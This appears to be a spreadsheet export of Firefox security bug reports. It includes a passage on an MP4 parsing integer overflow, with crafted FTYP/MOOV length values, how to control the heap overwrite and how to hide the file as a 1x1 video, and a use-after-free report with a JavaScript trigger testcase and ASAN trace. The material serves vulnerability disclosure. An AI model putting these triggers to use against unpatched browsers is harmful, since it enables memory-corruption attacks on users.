If the MP4 file is contrived so that the length fields of the FTYP and MOOV atoms overflow a size_t (4 bytes in 32-bit builds), line 194 overflows and allocates a too-small buffer. In the attached POC, the FTYP length field is 0x10008, and the MOOV length field is 0xffff0000. The total, computed as a 32-bit value, is thus 8, which is what line 194 passes to |metadata-&gt;SetLength()|, which then allocates that buffer. Line 202 then reads 0x10008 bytes into that buffer, overwriting 0x10000 bytes of memory beyond its end. The data that is written comes directly from the MP4 file. Line 207 (and therefore the attempt to play the file) fails, but that doesn't matter because the overwriting has already occurred.
An attacker can control what is written by adjusting the contents of the FTYP atom. The contents of the MOOV atom are immaterial, and are needed only to pad the file out to the required length.
An attacker can control the amount of overwriting by adjusting the lengths of the FTYP and MOOV atoms. For example, she can overwrite only 32 bytes by reducing the length of the FTYP atom to 0x28, and increasing the length of the MOOV atom to 0xffffffe0.
Note that the "8" in this discussion (e.g., "0x10008" and "0x28") is contrived so that MoofParser::Metadata copies the first 8 bytes of the FTYP atom into the allocated portion of the buffer, leaving the attacker with complete freedom to determine which data is written beyond its end.
An attacker can embed the MP4 file as a 1x1 pixel video so that the victim is unaware that she is "viewing" it.
Use the POC by putting a breakpoint on line 194, then loading the POC. Examine the computation of the sum (view disassembly) and notice that it's 8. Then step up to but not into line 202, open a memory window to the memory at |metadata-&gt;Elements()|, and step through line 202. Notice that 0x10000 bytes of attack data are written beyond its end. One or more threads might (or might not) crash when this occurs.</t>
        </is>
      </c>
      <c r="X722" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="723">
      <c r="A723" t="n">
        <v>1346654</v>
      </c>
      <c r="B723" t="inlineStr">
        <is>
          <t>2017-03-12 14:13:08 -0700</t>
        </is>
      </c>
      <c r="C723" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsFrameSelection::MoveCaret</t>
        </is>
      </c>
      <c r="D723" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:23 -0700</t>
        </is>
      </c>
      <c r="E723" t="n">
        <v>1</v>
      </c>
      <c r="F723" t="n">
        <v>1</v>
      </c>
      <c r="G723" t="n">
        <v>3</v>
      </c>
      <c r="H723" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I723" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J723" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K723" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L723" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M723" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N723" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O723" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P723" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q723" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R723" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S723" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T723" t="n">
        <v>1</v>
      </c>
      <c r="U723" t="n">
        <v>0</v>
      </c>
      <c r="V723" t="n">
        <v>23</v>
      </c>
      <c r="W723" t="inlineStr">
        <is>
          <t>The latest ASAN build of Firefox crashes when loading the following testcase. The testcase requires the fuzzPriv extension.
cript&gt;
function start() {
        o1=document.createElement('iframe');
        o1.src="data:text/html,&lt;div&gt;";
        o1.addEventListener('load', fun0,false);
        document.body.appendChild(o1);
}
function fun0() {
        a=o1.contentDocument.documentElement;
        o91=document.createElement('textarea');
        a.appendChild(o91);
        a.style.position='absolute';
        o91.focus();
        o1.contentWindow.onresize=fun1;
        o1.height='-8px';
        fuzzPriv.trustedKeyEvent(a,'press',false,false,true,false,35,0);
}
function fun1() {
        a.setAttribute('style','right:auto;');
        a.animate([{textShadow: ''},{textShadow: '',}],20);
        fuzzPriv.CC();
        fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==19751==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110002f4638 at pc 0x7fc2c18ef7ec bp 0x7fff28c6f7b0 sp 0x7fff28c6f7a8
READ of size 8 at 0x6110002f4638 thread T0 (Web Content)
    #0 0x7fc2c18ef7eb in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:972:8
    #1 0x7fc2c0ee9be3 in mozilla::SelectionMoveCommands::DoCommand(char const*, nsISupports*) /home/worker/workspace/build/src/editor/libeditor/EditorCommands.cpp:892:14
    #2 0x7fc2bf247366 in nsControllerCommandTable::DoCommand(char const*, nsISupports*) /home/worker/workspace/build/src/dom/commandhandler/nsControllerCommandTable.cpp:147:10
    #3 0x7fc2bf23dd2a in nsBaseCommandController::DoCommand(char const*) /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:136:10
    #4 0x7fc2c091c3a8 in nsXBLPrototypeHandler::DispatchXBLCommand(mozilla::dom::EventTarget*, nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLPrototypeHandler.cpp:498:5
    #5 0x7fc2c08f2fbf in nsXBLPrototypeHandler::ExecuteHandler(mozilla::dom::EventTarget*, nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLPrototypeHandler.cpp:221:12
    #6 0x7fc2c0938fc8 in nsXBLWindowKeyHandler::WalkHandlersAndExecute(nsIDOMKeyEvent*, nsIAtom*, nsXBLPrototypeHandler*, unsigned int, mozilla::dom::IgnoreModifierState const&amp;, bool, bool*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:755:19
    #7 0x7fc2c093359b in nsXBLWindowKeyHandler::WalkHandlersInternal(nsIDOMKeyEvent*, nsIAtom*, nsXBLPrototypeHandler*, bool, bool*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:618:12
    #8 0x7fc2c0932f57 in nsXBLWindowKeyHandler::WalkHandlers(nsIDOMKeyEvent*, nsIAtom*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:298:3
    #9 0x7fc2c0937705 in nsXBLWindowKeyHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:477:10
    #10 0x7fc2bf35fe89 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
    #11 0x7fc2bf361e18 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #12 0x7fc2bf34c80d in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:489:9
    #13 0x7fc2bf34cc14 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
    #14 0x7fc2bf34fdb7 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #15 0x7fc2bf352207 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:891:12
    #16 0x7fc2bd6b1cc1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1331:5
    #17 0x7fc2bf36d2b4 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/events/EventTarget.cpp:73:9
    #18 0x7fc2beab05a2 in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:974:15
    #19 0x7fc2beaad59f in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1150:13
    #20 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #21 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #22 0x7fc2c4a0fc72 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #23 0x7fc2c4a0fc72 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
    #24 0x7fc2c49f52ab in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #25 0x7fc2c4a29496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #26 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #27 0x7fc2c53fea93 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #28 0x7fc2bc2d2c39 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #29 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #30 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #31 0x7fc2c4a0fc72 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #32 0x7fc2c4a0fc72 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
    #33 0x7fc2c49f52ab in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #34 0x7fc2c4a29496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #35 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #36 0x7fc2c540084c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #37 0x7fc2be9da202 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #38 0x7fc2bf35fe4e in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #39 0x7fc2bf35fe4e in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1119
    #40 0x7fc2bf361e18 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #41 0x7fc2bf34c4f3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
    #42 0x7fc2bf34fdb7 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #43 0x7fc2bd289b5e in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3804:7
    #44 0x7fc2bf34c605 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:3
    #45 0x7fc2bf34c605 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468
    #46 0x7fc2bf34cc14 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
    #47 0x7fc2bf34fdb7 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #48 0x7fc2c15b7616 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #49 0x7fc2c3a8a6ca in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7642:5
    #50 0x7fc2c3a86384 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7436:7
    #51 0x7fc2c3a8dd8f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7333:13
    #52 0x7fc2bc57e9d0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #53 0x7fc2bc57d968 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:5
    #54 0x7fc2bc57a6c6 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #55 0x7fc2bc57c7c4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #56 0x7fc2bc57d37c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #57 0x7fc2bacc7c2b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:634:18
    #58 0x7fc2bd5ea76b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8863:7
    #59 0x7fc2bd5ea30b in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8789:9
    #60 0x7fc2bd5c033c in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5294:3
    #61 0x7fc2bd690062 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #62 0x7fc2bd690062 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #63 0x7fc2bd690062 in mozilla::detail::RunnableMethodImpl&lt;nsDocument*, void (nsDocument::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #64 0x7fc2baad4632 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:257:21
    #65 0x7fc2bab091b2 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #66 0x7fc2bab05a60 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #67 0x7fc2bb917cbf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #68 0x7fc2bb8898c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #69 0x7fc2bb8898c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #70 0x7fc2bb8898c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #71 0x7fc2c0d75bcf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #72 0x7fc2c45b6467 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:12
    #73 0x7fc2bb8898c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #74 0x7fc2bb8898c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #75 0x7fc2bb8898c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #76 0x7fc2c45b5e69 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:7
    #77 0x4e01b6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #78 0x4e01b6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #79 0x7fc2d5fc382f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #80 0x41c3d8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c3d8)
0x6110002f4638 is located 184 bytes inside of 232-byte region [0x6110002f4580,0x6110002f4668)
freed by thread T0 (Web Content) here:
    #0 0x4b2b2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fc2ba9a7344 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7fc2ba9a6f36 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7fc2ba9ae2f5 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3839:3
    #4 0x7fc2ba9adab0 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
    #5 0x7fc2ba9b0994 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4157:3
    #6 0x7fc2bd6cea00 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1452:3
    #7 0x7fc2bd2273fd in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7fc2bab24901 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7fc2bc3941a7 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7fc2bc3941a7 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7fc2bc3941a7 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7fc2bc39bb1b in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #15 0x7fc2c4a0fc72 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #16 0x7fc2c4a0fc72 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
    #17 0x7fc2c49f52ab in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7fc2c4a29496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #19 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #20 0x7fc2c53fea93 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #21 0x7fc2bc2d2c39 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #24 0x7fc2c4a0fc72 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #25 0x7fc2c4a0fc72 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
    #26 0x7fc2c49f52ab in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #27 0x7fc2c4a29496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #28 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #29 0x7fc2c56a971c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7fc2c56603ae in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
    #31 0x7fc2c5689189 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #32 0x7fc2c568bab4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #33 0x7fc2c4a29227 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #34 0x7fc2c4a29227 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #35 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #36 0x7fc2c540084c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
previously allocated by thread T0 (Web Content) here:
    #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e11bd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fc2bf7c05f0 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fc2bf7c05f0 in nsTextEditorState::BindToFrame(nsTextControlFrame*) /home/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:1170
    #4 0x7fc2c1a0d804 in nsTextControlFrame::CreateAnonymousContent(nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/forms/nsTextControlFrame.cpp:337:17
    #5 0x7fc2c1560d07 in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4224:17
    #6 0x7fc2c1553c72 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10979:3
    #7 0x7fc2c156a19b in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #8 0x7fc2c1575236 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #9 0x7fc2c1554ab4 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #10 0x7fc2c1554ab4 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
